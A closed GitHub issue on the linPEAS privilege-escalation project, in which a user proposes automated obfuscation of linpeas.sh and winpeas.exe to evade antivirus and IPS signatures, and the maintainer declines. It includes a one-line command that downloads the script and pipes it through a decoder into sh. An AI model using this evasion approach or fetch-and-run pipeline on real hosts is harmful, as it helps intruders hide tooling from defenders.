Closed Kracken256 closed 1 year ago
You maybe mean to automate something like what is suggested in https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS#av-bypass ?
openssl is one of the most common binaries in hosts (you can find it even in distroless containers).
The thing is that if we host the obfuscated version in this github repo, the AV is capable of detecting the linpeas just because of the URL. And if you are going to host it in your own server, in that page you have a very easy way to encrypt it and then decrypt it in memory.
So I don't think it's worth it to maintain an obfuscated/encrypted version inside this repo.
Suggestions to auto obfuscate LinPeas.sh
Include a script to take the linpeas.sh binary (any version) that does this:
Create another script (pure bash or perl) that does the inverse. It should accept the 8-character key as a parameter. Also, the script should allow input from stdin. So it can be executed in a simple `curl host/linpeas.sh | curl decode_script.sh -p abcdef12 | sh`. Or something like that. This will ensure that every linpeas script used on the box will have a significantly different signature. If/When IPS gets updated for it, just change the encoding.
The decode script should be as small as possible.
I have already written Python scripts to do this. Bash scripts are not my fav.
The same concept should work for Windows winpeas.exe. Just write the decoded binary to disk and execute it.